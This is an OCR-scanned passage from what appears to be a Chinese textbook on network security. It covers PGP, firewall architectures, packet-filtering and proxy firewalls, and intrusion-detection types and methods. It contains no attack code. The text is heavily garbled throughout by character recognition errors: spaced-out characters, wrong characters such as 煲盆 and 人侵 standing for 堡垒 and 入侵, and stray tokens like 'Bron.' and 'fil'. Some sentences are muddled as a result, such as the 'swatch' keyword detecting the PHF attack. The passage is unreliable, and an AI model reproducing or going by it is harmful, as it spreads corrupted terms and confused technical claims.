进行 解密 的 用 户 就 是 合法 用 户 。 用 户 在 对 应 用 服务 器 进行 访问 前 ,必须 从 第 三 方 获取 该 应 
用 服务 器 的 访问 许可 证 。 

2. 用 于 提高 电子 邮件 的 安全 性 

目前 电子 邮件 广泛 应 用 的 保密 方法 是 PGPCPretty Good Privacy),PGP 采用 的 解决 方 
案 是 给 每 个 公 钥 分 配 一 个 密 钥 标 识 ,并 在 很 大 概率 上 与 用 户 标识 一 一 对 应 。 发 送 方 需要 使 
用 一 个 私 钥 加 密 消 息 摘要 ,接收 方 必须 知道 应 使 用 哪个 公 钥 解 密 。 相 应 地 ,消息 的 数字 签名 
部 分 必须 包括 公 钥 对 应 的 64 位 密 钥 标识 。 当 接收 到 消息 后 ,接收 方 用 密 钥 标 识 指示 的 公 
验证 签名 。 

密码 技术 并 不 能 解决 所 有 的 网 络 安全 问题 , 它 需要 与 信息 安全 的 其 他 技术 (如 访问 控制 
技术 、 网 络 监 控 技 术 等 ) 互 相 融 合 , 形 成 综合 的 信息 网 络 安全 保障 。 


2.2 防火 墙 技术 


防火 墙 技术 是 建立 在 现代 通信 网 络 技术 和 信息 安全 技术 基础 上 的 应 用 性 安全 技术 , 越 
来 越 多 地 应 用 于 专用 网 络 与 公用 网 络 的 互联 环境 中 。 防 火 墙 本 身 具 有 较 强 的 抗 攻击 能 力 ， 
它 是 提供 信息 安全 服务 、 实 现 网 络 和 信息 安全 的 基础 设施 。 

防火 墙 具 有 如 下 特征 : 

。 网 络 位 置 特性 : 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数据 都 必须 经 过 防火 墙 。 

。 工作 原理 特性 : 符合 安全 策略 的 数据 才能 通过 防火 墙 。 

。 先决 条 件 : 防火 墙 自身 应 具有 非常 强 的 抗 攻 击 能 力 。 

常见 防火 墙 技术 主要 有 包 过 滤 技 术 、 应 用 代理 技术 和 状态 检测 技术 。 


2.2.1 防火 墙 的 体系 结构 


防火 墙 的 基本 体系 结构 包括 包 过 滤 路 由 器 防火 墙 \ 屏 蔽 主机 防火 墙 和 屏蔽 子 网 ( 非 军事 
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区 ) 防 火 墙 。 

1. 包 过 滤 路 由 器 防火 墙 

包 过 滤 路 由 器 是 一 种 便宜 ,简单 .常见 的 防火 墙 。 包 过 滤 路 由 器 在 网 络 之 间 完 成 数据 包 
转发 的 普通 路 由 功能 ,并 利用 包 过 滤 规 则 来 允许 或 拒绝 数据 包 , 其 结构 如 图 2.2. 1 所 示 。 

尽管 这 种 防火 墙 系统 有 价格 低 和 易于 使 用 的 优点 ,但 也 存在 缺点 ,如 配置 不 当 的 路 由 器 
可 能 受到 攻击 ,以 及 利用 数据 包 通 过 服务 和 系统 允许 的 操作 进行 攻击 等 。 由 于 允许 在 内 部 
和 外 部 系统 之 间 直 接 交换 数据 包 , 因 此 攻击 面 可 能 会 扩展 到 所 有 主机 和 路 由 器 所 人 允许 的 全 
部 服务 上 。 另 外 ,如 果 有 一 个 包 过 滤 路 由 器 被 渗透 , 则 内 部 网 络 上 的 所 有 系统 都 可 能 会 受到 
损害 。 

2. 屏蔽 主机 防火 墙 

屏蔽 主机 防火 墙 系统 采用 了 包 过 滤 路 由 器 和 堡垒 主机 ,其 结构 如 图 2. 2.2 所 示 。 这 个 
防火 墙 系统 提供 的 安全 等 级 比 包 过 滤 路 由 器 要 高 ,因为 它 实 现 了 网 络 层 安全 ( 包 过 滤 ) 和 应 
用 层 安全 (代理 服务 ), 所 以 入 侵 者 在 破坏 内 部 网 络 的 安全 性 之 前 ,必须 首先 渗透 两 种 不 同 的 
安全 系统 。 
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图 221 包 过 滤 路 由 器 防火 墙 图 222 屏蔽 主机 防火 墙 ( 单 堡 公 主机 ) 








在 这 种 防火 墙 系统 中 , 保 垒 主机 配置 在 内 部 网 络 上 ,而 包 过 滤 路 由 器 则 放置 在 内 部 网 络 
和 外 部 网 络 之 间 。 在 路 由 器 上 进行 规则 配置 ,使 得 外 部 系统 只 能 访问 煲 盆 主机 ,去 往 内 部 系 
统 上 其 他 主机 的 信息 全 部 被 阻塞 。 由 于 内 部 主机 与 堡垒 主机 处 于 同一 个 网 络 ,内 部 系统 是 
允许 直接 访问 外 部 网 络 还 是 要 求 使 用 堡垒 主机 上 的 代理 服务 来 访问 外 部 网 络 ,全 部 由 安全 
策略 来 决定 。 对 路 由 器 的 过 滤 规 则 进行 配置 ,使 得 其 只 接收 来 自 堡垒 主 机 的 内 部 数据 包 ,并 
强制 内 部 用 户 使 用 代理 服务 。 
用 双 宿 堡垒 主机 可 以 构造 更 加 安全 的 防火 墙 系统 ,如 图 2.2. 3 所 示 。 这 种 物理 结构 强 
行将 让 所 有 去 往 内 部 网 络 的 信息 经 过 堡垒 主 机 ,由 于 堡垒 主机 是 唯一 能 从 外 部 网 络 直接 访 
问 的 内 部 系统 ,因此 有 可 能 受到 攻击 的 主机 就 只 有 堡垒 主机 本 身 。 但 是 ,如 果 允 许 用 户 注册 
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图 223 屏蔽 主机 防火 墙 ( 双 宿 堡 又 主机 ) 
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到 堡垒 主 机 ,那么 整个 内 部 网 络 上 的 主机 都 会 受到 攻击 的 威胁 。 牢 固 可 靠 、 避 免 被 渗透 和 不 
允许 用 户 注册 对 堡垒 主 机 来 说 是 至 关 重 要 的 。 

3. 屏蔽 子 网 防火 墙 

屏蔽 子 网 防火 墙 采用 了 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 ,如 图 2.2.4 所 示 。 这 个 防 
火 墙 系统 建立 的 是 最 安全 的 防火 墙 系统 ,因为 在 定义 了 * 非 军事 区 ”(DMZ) 网络 后 , 它 支 持 
网 络 层 和 应 用 层 安全 功能 。 网 络 管理 员 将 堡垒 主机 、 信 息 服 务 器 .Modem 组 以 及 其 他 公用 
服务 器 放 在 DMZ 网 络 中 。 通 过 DMZ 网 络 直接 进行 信息 传输 是 严格 禁止 的 。 
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图 224 屏蔽 子 网 防火 墙 

外 部 路 由 器 用 于 防范 通常 的 外 部 攻击 (如 源 地 址 欺骗 和 源 路 由 攻击 ), 并 管理 外 部 网 络 
到 DMZ 网 络 的 访问 。 它 只 允许 外 部 系统 访问 堡垒 主机 。 内 部 路 由 器 则 提供 第 二 层 防御 ， 
只 接收 来 自 堡 又 主机 的 数据 包 , 负 责 管理 DMZ 到 内 部 网 络 的 访问 。 

部 署 屏蔽 子 网 防火 墙 系统 有 如 下 好 处 : 入 侵 者 必须 突破 外 部 路 由 器 、. 保 又 主机 和 内 部 
路 由 器 3 个 不 同 的 设备 才能 侵袭 内 部 网 络 。 由 于 外 部 路 由 器 只 能 向 外 部 网 络 通告 DMZ 网 
络 的 存在 ,这 样 网 络 管理 员 就 可 以 保证 内 部 网 络 是 “不 可 见 ” 的 ;由 于 内 部 路 由 器 只 向 内 部 网 
络 通告 DMZ 网 络 的 存在 ,内 部 网 络 上 的 系统 不 能 直接 通 往外 部 网 络 , 这 样 就 保证 了 内 部 网 
络 上 的 用 户 必 须 通 过 驻 留 在 堡垒 主机 上 的 代理 服务 才能 访问 外 部 网 络 。 

2.2.2 包 过 滤 防 火 墙 


包 过 滤 防 火 墙 工作 在 OSI 网 络 参 考 模型 的 网 络 层 和 传输 层 , 它 根据 数据 包 报 头 的 源 地 
址 \ 目 的 地 址 、 端 口号 和 协议 类 型 等 标志 确定 数据 流 是 否 允许 通过 ,其 结构 如 图 2. 2. 5 所 示 。 
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图 225 包 过 滤 防火 墙 结构 


























包 过 滤 是 一 种 网 络 安全 保护 机 制 ,用 来 控制 进出 网 络 的 数据 流 。 通 过 控制 存在 于 某 一 
网 段 的 数据 流 类 型 , 包 过 滤 技术 可 以 限定 存在 于 某 一 网 段 的 服务 内 容 。 不 符合 网 络 安全 的 


服务 将 被 严格 限制 。 基 于 包 中 的 协议 类 型 和 字段 值 , 过 滤 路 由 器 能 够 区 分 数据 流量 。 
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包 过 滤 技 术 的 优点 如 下 : 

。 一 个 独立 的 、 网 络 位 置 适当 的 包 过 滤 路 由 器 有 助 于 保护 整个 网 络 。 如 果 仅 有 一 个 路 
由 器 连接 内 部 与 外 部 网 络 ,不 论 内 部 网 络 大 小 .拓扑 结构 如 何 , 通 过 单个 路 由 器 进行 
数据 包 过 滤 ,在 网 络 安全 保护 上 都 会 取得 较 好 的 效果 。 

。 数据 包 过 滤 对 用 户 透 明 。 不 同 于 代理 技术 ,数据 包 过 滤 不 要 求 任 何 自 定义 配置 ,也 
不 要 求 用 户 进 行 任何 特殊 学 习 。 较 强 的 “透明 度 " 是 包 过 滤 技 术 的 一 大 优势 。 

。 过 滤 速 度 快 . 效 率 高 。 较 代理 技术 而 言 , 包 过 滤 技 术 只 检查 报头 的 相应 字段 ,一 般 不 
查看 数据 包 的 内 容 , 且 核心 部 分 是 由 硬件 实现 的 , 故 转 发 速度 快 .效率 高 。 

包 过 滤 技 术 的 缺点 如 下 : 

。 不 能 彻底 防止 地 址 欺骗 。 大 多 数 包 过 滤 技 术 都 是 基于 源 IP 地 址 .目的 IP 地 址 而 进 

行 过 滤 的 。 而 IP 地 址 的 伪造 是 很 容易 、 很 普遍 的 ,即使 按 MAC 地 址 进行 绑 定 也 是 

不 可 信 的 。 对 于 一 些 安全 性 要 求 较 高 的 网 络 , 包 过 滤 技术 无 法 满足 要 求 。 

部 分 应 用 协议 不 适合 于 数据 包 过 滤 。RPC、X-Window fil FTP 等 应 用 协议 无 法 适用 

于 包 过 滤 技 术 。 服 务 代 理 和 HTTP 链接 ,也 会 削弱 基于 源 地 址 和 源 端 口 的 过 滤 

功能 。 

* 数据 包 过 滤 技 术 无 法 执行 某 些 安全 策略 。 数 据 包 过 滤 技 术 所 提供 的 信息 不 能 完全 
满足 人 们 对 安全 策略 的 需求 ,不 能 强行 限制 特殊 的 用 户 。 同 样 , 当 通 过 端口 号 对 高 
级 协议 强行 进行 限制 时 ,恶意 的 知情 者 能 够 很 容易 地 破坏 这 种 控制 。 

从 以 上 分 析 可 以 看 出 , 包 过 滤 防 火 墙 技术 虽然 能 确保 一 定 的 安全 保护 ,但 是 作为 第 一 代 

防火 墙 技术 ,本 身 存在 较 多 缺陷 .不 能 提供 较 高 的 安全 性 。 在 实际 应 用 中 ,很 少 把 包 过 滤 技 

术 当 作 单 独 的 安全 解决 方案 ,而 是 通常 把 它 与 其 他 防火 墙 技 术 捆 绑 使 用 。 


2.2.3 代理 防火 墙 


代理 防火 墙 是 一 种 较 新 型 的 防火 墙 技术 ,其 特点 是 完全 “阻隔 "了 网 络 数据 流 , 通 过 对 每 
种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 数据 流 的 功能 。 它 分 为 应 用 层 网 
关 和 电路 层 网 关 。 

代理 防火 墙 工作 于 应 用 层 , 且 针对 特定 的 应 用 层 协议 。 代 理 防 火 墙 通过 软件 方式 获取 
应 用 层 通 信 流 量 , 并 在 用 户 层 和 应 用 协议 层 提供 访问 控制 ,保持 所 有 应 用 程序 的 使 用 记录 。 
记录 和 控制 所 有 进出 流量 的 能 力 是 应 用 层 网 关 的 主要 优点 之 一 。 

如 图 2. 2. 6 所 示 ,代理 服务 器 作为 内 部 网 络 客户 端的 服务 器 拦截 住所 有 要 求 , 也 向 客户 
端 转 发 响应 。 代 理 客户 (proxy client) 负 责 代表 内 部 客户 端 向 外 部 服务 器 发 出 请 求 , 当然 也 
向 代理 服务 器 转发 响应 。 当 某 用 户 想 和 一 个 和 运行 代理 的 网 络 建立 联系 时 ,应 用 层 网 关 会 阻 
塞 这 个 连接 ,然后 对 连接 请 求 的 各 个 域 进行 检查 。 如 果 此 连接 请 求 符合 预定 的 安全 策略 或 
规则 ,代理 防火 墙 便 会 在 用 户 和 服务 器 之 间 建 立 一 个 “ 桥 ”, 从 而 保证 其 通信 。 对 不 符合 预定 
的 安全 规则 的 , 则 阻塞 或 抛弃 。 

男 一 种 类 型 的 代理 技术 称 为 电路 层 网 关 (circuit gateway)。 在 电路 层 网 关中 , 包 被 提交 
至 用 户 应 用 层 处 理 。 电 路 层 网 关 用 来 在 两 个 通信 端 之 间 转 换 包 ,如 图 2. 2.7 Bron. 

电路 层 网 关 是 建立 应 用 层 网 关 的 一 个 更 加 灵活 的 方法 。 在 电路 层 网 关中 ,特殊 的 客户 
机 软件 可 能 要 安装 ,用 户 需要 一 个 用 户 接口 来 相互 作用 。 
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图 226 应 用 层 网 关 代 理 技 术 
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图 227 电路 层 网 关 代理 技术 


代理 防火 墙 技术 的 优点 如 下 : 


代理 技术 易于 配置 。 由 于 是 软件 ,所 以 代理 技术 较 过 滤 路 由 器 更 易 配置 。 如 果 代理 
技术 实现 得 好 , 则 对 配置 协议 的 要 求 可 以 低 一 些 , 从 而 避免 了 配置 错误 。 

代理 技术 能 生成 各 项 记录 。 代 理工 作 在 应 用 层 , 它 检查 各 项 数据 ,所 以 可 以 生成 各 
项 上 日志、 记录 。 这 些 日 志 、 记 录 对 于 流量 分 析 安全 检验 是 十 分 重要 的 。 

代理 技术 能 灵活 地 控制 进出 流量 。 通 过 采取 一 定 的 措施 ,按照 一 定 的 规则 ,可 以 借 
助 代理 技术 实现 一 整套 的 安全 策略 。 

代理 技术 能 过 滤 数 据 内 容 。 可 以 把 一 些 过 滤 规 则 应 用 于 代理 技术 ,让 它 实现 文本 过 
滤 、 图 像 过 滤 、 预 防 病毒 或 扫描 病毒 等 功能 。 

代理 技术 能 为 用 户 提供 透明 的 加 密 机 制 。 代 理 技术 能 够 完成 加 解密 的 功能 ,从 而 确 
保 数 据 的 机 密 性 ,这 点 在 虚拟 专用 网 中 特别 重要 。 

代理 技术 可 以 方便 地 与 其 他 安全 手段 集成 。 目 前 安全 问题 解决 方案 很 多 ,如 认证 
(authentication) ,授权 (authorization) ,账号 (accouting) .数据 加 密 、 安 全 协议 (SSL) 
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等 。 如 果 联 合 使 用 代理 技术 与 这 些 手 段 ,将 大 大 地 增加 网 络 安全 性 。 

代理 防火 墙 技 术 的 缺点 如 下 : 

。 代理 技术 速度 较 路 由 器 慢 。 路 由 器 只 是 简单 检查 TCP/IP 报头 特定 的 几 个 域 ,不 做 
详细 分 析 .记录 。 而 代理 工作 于 应 用 层 , 要 检查 数据 包 的 内 容 , 按 特定 的 应 用 协议 
(如 HTTP) 进 行 审查 .扫描 数据 包 内 容 , 进 行 代理 (转发 请 求 或 响应 ) ,速度 较 慢 。 

。 代理 技术 对 用 户 不 透明 。 许 多 代理 技术 要 求 用 户 安 装 特定 客户 端 软件 ,这 给 用 户 增 
加 了 不 透明 度 。 安 装 和 配置 特定 的 应 用 程序 既 耗 费时 间 , 又 容易 出 错 。 

。 代理 服务 不 能 保证 免 受 所 有 协议 弱点 的 限制 。 作 为 一 个 安全 问题 的 解决 方法 ,代理 
技术 取决 于 对 协议 中 哪些 是 安全 操作 的 判断 能 力 。 每 个 应 用 层 协议 ,都 或 多 或 少 地 
存在 一 些 安全 问题 ,对 于 一 个 代理 服务 器 来 说 ,要 彻底 避免 这 些 安全 隐患 几乎 是 不 
可 能 的 ,除非 关 掉 这 些 服务 。 

。 代理 技术 不 能 改进 底层 协议 的 安全 性 。 因 为 代理 工作 在 TCP/IP 之 上 ,属于 应 用 
层 , 所 以 它 不 能 改善 底层 通信 协议 的 能 力 , 如 IP 欺骗 .SYN 泛滥 ,伪造 ICMP 消息 
和 一 些 拒绝 服务 攻击 ,而 这 些 方面 对 于 网 络 的 健壮 性 是 相当 重要 的 。 
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供 实 时 的 入 侵 检测 能 力 , 对 于 来 自 于 内 部 网 络 的 攻击 ,防火 墙 形同虚设 。 入 侵 检测 是 对 防火 
墙 极其 有 益 的 补充 。 人 侵 检测 系统 能 在 入 侵 攻击 对 系统 发 生 危 害 前 检测 到 入 侵 攻击 ,并 利 
用 报警 与 防护 系统 驱逐 入 侵 攻 击 。 在 人 侵 攻击 过 程 中 ,能 减少 人 侵 攻击 所 造成 的 损失 。 在 
被 人 侵 攻击 后 ,收集 入 侵 攻 击 的 相关 信息 ,作为 防范 系统 的 知识 添加 到 知识 库 内 ,增强 系统 
的 防范 能 力 , 避 免 系统 再 次 受到 入 侵 。 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进 行 监听 ,从 而 提 
供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 ,大 大 提高 了 网 络 的 安全 性 。 


2.3.1 入 侵 检 测 技术 分 类 


入 侵 检测 是 从 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 搜集 信息 并 对 其 进行 分 析 , 从 
中 发 现 网 络 或 系统 中 是 否 存 在 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 的 一 种 机 制 。 入 侵 检 
测 系统 使 用 入 侵 检测 技术 对 网 络 与 系统 进行 监视 ,并 根据 监视 结果 采取 不 同 的 安全 动作 ,从 
而 最 大 限度 地 降低 可 能 的 入 侵 危 害 。 经 过 几 年 的 发 展 ,入 侵 检 测 产 品 步 和 快速 的 成 长 期 。 


2.3.1.1 基于 网 络 的 人 侵 检 测 


基于 网 络 的 入 侵 检测 产品 (NIDS) 放 置 在 比较 重要 的 网 段 内 ,不 停 地 监视 网 段 中 的 各 种 
数据 包 , 对 数据 包 进 行 特 征 分 析 。 如 果 数 据 包 与 内 置 的 某 些 规则 吻合 ,入 侵 检测 系统 就 会 发 
出 警报 甚至 直接 切断 网 络 连 接 。 目 前 ,大 部 分 人 侵 检 测 产 品 是 基于 网 络 的 。 值 得 一 提 的 是 ， 
在 网 络 人 侵 检测 系统 中 ,有 多 个 久负盛名 的 开放 源码 软件 ,如 Snort、NFR、Shadow 等 。 

网 络 入 侵 检测 系统 的 优点 如 下 : 

。 网 络 入 侵 检 测 系统 能 够 检测 来 自 网 络 的 攻击 ,特别 是 越权 的 非法 访问 。 

。 不 需要 改变 服务 器 等 主机 的 配置 ,不 占用 过 多 的 系统 资源 ,不 影响 业务 系统 的 性 能 。 
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。 发 生 故 障 不 会 影响 正常 业务 的 运行 ,部 署 一 个 网 络 人 侵 检测 系统 的 风险 比 主 机 入 侵 
检测 系统 的 风险 少 得 多 。 

网 络 入侵 检 测 系统 的 缺点 如 下 : 

。 网 络 入 侵 检 测 系统 只 检查 直接 连接 网 段 的 通信 ,不 能 检测 在 不 同 网 段 的 网 络 包 。 在 
使 用 交换 以 太 网 的 环境 中 会 出 现 监测 范围 的 局 限 。 而 安装 多 台 网 络 人 侵 检测 系统 
的 传感器 会 使 部 署 整个 系统 的 成 本 大 大 增加 。 

。 网 络 入 侵 检 测 系统 为 了 性 能 目标 通常 采用 特征 检测 的 方法 , 它 可 以 检测 出 普通 的 一 
些 攻击 ,而 很 难 实现 一 些 复杂 的 需要 大 量 计算 与 分 析 时 间 的 攻击 检测 。 

。 网 络 入 侵 检 测 系统 可 能 会 将 大 量 的 数据 传 回 分 析 系 统 中 。 在 一 些 系 统 中 监听 特定 
的 数据 包 会 产生 大 量 的 分 析 数 据 流量 。 这 样 的 系统 中 的 传感器 协同 工作 能 力 较 弱 。 

。 网 络 信 侵 检测 系统 处 理 加密 的 会 话 过 程 比较 困难 ,目前 ,通过 加 密 通 道 的 攻击 尚 不 
多 ,但 随 着 IPv6 的 普及 ,这 个 问题 会 越 来 越 突 出 。 


2.3.1.2 基于 主机 的 人 侵 检 测 





基于 主机 的 和 人 侵 检测 产品 (HIDS) 通 常 是 安装 在 被 重点 监测 的 主机 上 ,对 该 主机 的 网 络 
连接 以 及 系统 审计 日 志 进 行 智 能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 ,入 侵 检测 系统 
就 会 采取 相应 措施 。 
主机 入 侵 检测 系统 的 优点 : 
。 主 机 入 侵 检测 系统 与 网 络 入 侵 检测 系统 相 比 通常 能 够 提供 更 详尽 的 相关 信息 。 
。 主 机 入 侵 检 测 系统 通常 情况 下 比 网 络 入 侵 检 测 系 统 误 报 率 低 ,因为 检测 主机 上 运行 
的 命令 序列 比 检测 网 络 流 更 简单 ,系统 的 复杂 性 也 少 得 多 。 

主机 入 侵 检测 系统 的 缺点 : 

。 主 机 入 侵 检 测 系统 安装 在 需要 保护 的 设备 上 ,会 降低 应 用 系统 的 效率 。 安 装 了 主机 
入 侵 检 测 系统 后 ,将 本 不 允许 安全 管理 员 访 问 的 服务 器 变 成 可 以 访问 的 了 。 

。 主机 入 侵 检测 系统 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 。 如 果 服 务 器 没有 配置 日 
志 功 能 , 则 必须 重新 配置 ,这 将 会 给 运行 中 的 业务 系统 的 性 能 带 来 不 可 预见 的 影响 。 

。 全 面部 署 主机 入 侵 检测 系统 代价 较 大 ,只 能 选择 部 分 主机 保护 。 那 些 未 安装 主机 入 
侵 检 测 系统 的 机 器 将 成 为 保护 的 盲点 ,入 侵 者 可 利用 这 些 机 器 达到 攻击 目标 。 

。 主 机 入 侵 检测 系统 除了 监测 自身 的 主机 以 外 ,根本 不 监测 网 络 上 的 情况 。 分 析 入 侵 

行为 的 工作 量 将 随 着 主机 数目 的 增加 而 增加 。 


2.3.1.3 混合 人 侵 检 测 


基于 网 络 的 入 侵 检测 产品 和 基于 主机 的 入 侵 检测 产品 都 有 不 足 之 处 ,单纯 使 用 一 类 产 
品 会 造成 主动 防御 体系 不 够 全 面 。 但 是 .它们 的 缺陷 是 可 以 互补 的 。 综 合 基 于 网 络 和 基于 
主机 两 种 结构 特点 的 人 侵 检测 系统 , 既 可 发 现 网 络 中 的 攻击 信息 ,也 可 从 系统 日 志 中 发 现 异 
常情 况 , 构 建 一 套 完整 立体 的 主动 防御 体系 , 称 为 混合 人 侵 检测 方法 。 


2.3.1.4 文件 完整 性 检查 


文件 完整 性 检查 系统 检查 计算 机 中 文件 的 变化 情况 。 文 件 完整 性 检查 系统 保存 有 每 个 
。28 。 











文件 的 数字 文摘 数据 库 , 每 次 检查 时 , 它 重 新 计算 文件 的 数字 文摘 并 将 它 与 数据 库 中 的 值 相 
比较 ,如 果 不 同 , 则 文件 已 被 修改 ;如 果 相 同 , 则 文件 未 发 生变 化 。 
文件 完整 性 检查 系统 的 优点 如 下 : 
。 从 数学 上 分 析 , 攻 克文 件 完整 性 检查 系统 ,无 论 是 时 间 上 还 是 空间 上 都 是 不 可 能 的 。 
文件 完整 性 检查 系统 是 检测 系统 是 否 被 非法 使 用 的 重要 工具 之 一 。 
。 文件 完整 性 检查 系统 具有 相当 的 灵活 性 ,可 以 配置 成 为 监测 系统 中 所 有 文件 或 某 些 
重要 文件 。 
文件 完整 性 检查 系统 的 缺点 如 下 : 
。 文件 完整 性 检查 系统 依赖 于 本 地 的 文摘 数据 库 。 与 日 志文 件 一 样 , 这 些 数 据 可 能 被 
入 侵 者 修改 。 
。 做 完整 的 文件 完整 性 检查 是 一 个 非常 耗 时 的 工作 。 
。 系统 有 些 正 常 的 更 新 操作 可 能 会 带 来 大 量 的 文件 更 新 ,从 而 产生 比较 繁杂 的 检查 与 
分 析 工 作 。 


2.3.2 入 侵 检 测 系 统 结构 


入 侵 检 测 系统 英文 全 称 为 Intrusion Detection System.1980 年 4 月 ,研究 人 员 在 为 美国 空 
军 提交 的 一 份 题 为 (计算 机 安全 威胁 监控 与 监视 ) 的 技术 报告 中 ,第 一 次 完整 地 介绍 了 入 侵 检 
测 技 术 的 概念 。 报 告 认为 这 是 一 种 对 计算 机 系统 风险 和 威胁 的 分 类 方法 ,并 将 威胁 分 为 外 部 
渗透 .内 部 渗透 和 不 法 行为 3 种 ,还 提出 了 利用 审计 跟踪 数据 监视 入 侵 活动 的 核心 思想 。 


2.3.2.1 人 侵 检 测 系统 结构 


一 个 人 侵 检 测 产品 通常 由 两 部 分 组 成 : 传感器 (sensor) 与 控制 台 (console)。 传 感 器 负 
责 采 集 数据 (网 络 包 、 系 统 日 志 等 )、 分 析 数 据 并 生成 安全 事件 。 控 制 台 主要 起 到 中 央 管理 的 
作用 ,商品 化 的 产品 通常 提供 图 形 界 面 的 控制 台 , 这 些 控制 台 基 本 上 都 支持 Windows NT 

台 。 和 信 侵 检测 系统 采用 的 技术 主要 包括 特征 检测 和 异常 检测 两 类 。 

CD 特征 检测 (Signature-based Detection) ; 该 类 技术 将 入 侵 活动 定义 为 一 种 模式 ,人 
侵 检测 过 程 则 是 寻找 与 人 侵 行为 相 匹配 的 各 种 模式 。 该 类 技术 能 够 很 准确 地 将 已 有 的 入 侵 
行为 检查 出 来 ;但 由 于 缺乏 相 匹 配 的 模式 , 故 无 法 检测 到 新 的 入 侵 行为 。 特 征 检 测 方 式 与 计 
算 机 病毒 扫描 技术 相 类 似 , 核 心 问 题 在 于 如 何 设计 模式 , 尽 可 能 地 将 各 种 非法 活动 陡 括 
进来 。 

(2) 异常 检测 (Abnormally Detection) : 首先 ,检测 系统 预先 定义 出 一 组 正常 运行 的 环 
境 变 量 , 主 要 包括 CPU 运行 情况 、 内 存 利用 率 、 网 络 平均 流量 等 ,这 些 环境 信息 可 以 人 为 地 
根据 经 验 知识 定义 ,也 可 以 采用 统计 方法 根据 系统 日 常 运行 情况 得 出 。 当 和 人 侵 检测 系统 在 
检测 过 程 中 发 现 运行 数据 与 预先 定义 环境 参数 差异 较 大 时 ,系统 就 会 认定 存在 人 侵 情况 ,并 
进一步 进行 检查 。 这 类 技术 的 核心 问题 是 如 何 准确 地 定义 系统 正常 的 环境 变量 。 


2.3.2.2 常用 人 侵 检测 方法 


据 公安 部 计算 机 信息 系统 安全 产品 质量 监督 检验 中 心 的 报告 ,国内 送 检 的 入侵 检测 产 
品 中 95% 是 属于 使 用 入 侵 模 板 进行 模式 匹配 的 特征 检测 产品 ,少量 是 采用 概率 统计 的 统计 
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检测 产品 与 基于 日 志 的 专家 知识 库 系统 产品 。 入 侵 检测 系统 常用 的 检测 方法 有 特征 检测 、 
统计 检测 与 专家 系统 。 

1. 特征 检测 

特征 检测 对 已 知 的 攻击 或 人 侵 的 方式 作出 确定 性 的 描述 ,形成 相应 的 事件 模式 。 当 被 
审计 的 事件 与 已 知 的 入 侵 事 件 模 式 相 匹配 时 即 报警 。 该 方法 预报 检测 的 准确 率 较 高 ,但 对 
于 无 经 验 知识 的 人 侵 与 攻击 行为 无 能 为 力 。 

2. 统计 检测 

在 统计 模型 中 常用 的 测量 参数 包括 审计 事件 的 数量 .间隔 时 间 ,资源 消耗 情况 等 ,常用 
的 入侵 检测 包括 以 下 5 种 统计 模型 。 

CD 操作 模型 。 该 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指标 相 比 较 得 到 ,固定 指 
标 可 以 根据 经 验 值 或 一 段 时 间 内 的 统计 平均 得 到 。 

(2) 方差 。 计 算 参 数 的 方差 , 设 定 其 置信 区 间 , 当 测量 值 超过 置信 区 间 的 范围 时 表明 有 
可 能 是 异常 。 

(3) 多 元 模型 。 操 作 模 型 的 扩展 ,通过 同时 分 析 多 个 参数 实现 检测 。 

(4) 马尔 柯 夫 过 程 模型 。 将 每 种 类 型 的 事件 定义 为 系统 状态 ,用 状态 转移 矩阵 来 表示 
状态 的 变化 ,如 果 该 状态 矩阵 转移 的 概率 较 小 ,那么 可 能 是 异常 事件 。 

(5) 时 间 序 列 分 析 。 将 事件 计数 与 资源 消耗 用 时 间 排 成 序列 ,如 果 一 个 新 事件 在 该 时 
间 发 生 的 概率 较 低 , 则 该 事件 可 能 是 入 侵 。 

3. 专家 系统 

用 专家 系统 对 入 侵 进 行 检测 ,经 常 是 针对 特征 检测 入 侵 行为 。 专 家 系统 的 建立 依赖 于 
知识 库 的 完备 性 ,知识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 与 实时 性 。 入 侵 的 特征 抽取 
与 表达 ,是 入 侵 检测 专家 系统 的 关键 。 专 家 系统 防范 的 有 效 性 完全 取决 于 专家 系统 知识 库 
的 完备 性 。 


2.3.3 重要 的 入 侵 检 测 系统 


以 下 是 几 种 针对 不 同 的 检测 对 象 的 重要 的 入 侵 检测 系统 。 

COD 系统 完整 性 检测 (System integrity verifiers,SIV): 主要 用 于 检测 系统 文件 或 注册 
表 等 重要 位 置信 息 是 否 被 算 改 ,防止 入侵 者 在 入 侵 过 程 中 留 下 系统 的 后 门 。 该 类 系统 的 工 
具 软 件 较 多 ,如 Tripwire, 它 可 以 检测 到 重要 系统 组 件 的 变动 ,但 不 产生 实时 报警 信息 。 

(2) 网 络 人 侵 检 测 系 统 (Network Intrusion Detection System, NIDS); 主要 用 于 检测 
黑客 或 骇 客 通过 网 络 进行 的 各 类 入 侵 行 为 。NIDS 的 运用 方式 有 两 种 , 即 在 目标 主机 上 以 
监测 通信 信息 为 主 的 检测 模式 ,以 及 在 独立 机 器 上 以 监测 网 络 设 备 运行 为 目标 的 单机 模式 。 

(3) 日 志文 件 监测 器 (Log File Monitors, LFM); 主要 用 于 监测 网 络 日 志文 件 内 容 , 是 
一 种 特征 检测 技术 的 典型 应 用 。LFM 通过 将 日 志文 件 内 容 与 关键 字 不 断 匹 配 ,来 获取 入 侵 
行为 的 存在 。 例 如 ,对 于 HTTP 服务 器 的 日 志文 件 ,只 要 匹配 关键 字 swatch, 就 能 够 检测 
到 是 否 存 在 PHF 攻击 。 

(4) 虚拟 蜜 网 (又 称 蜜 钠 系 统 ,Honeypots): 是 一 个 包含 若干 漏洞 的 诱骗 系统 。 它 通过 
模拟 一 个 或 多 个 易 受 到 攻击 的 主机 ,为 攻击 者 创造 一 个 极 易 入 侵 的 目标 。 由 于 每 个 蜜 饶 并 
无 任何 实际 的 运行 活动 . 故 任何 接 和 人 都 被 认为 是 可 以 的 。 虚 拟 蜜 网 最 大 的 优势 在 于 它 为 真 
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实 的 主机 赢得 了 防范 人 侵 的 时 间 ,拖延 攻击 者 对 真实 目标 的 攻击 ;同时 ,诱捕 系统 能 够 不 断 
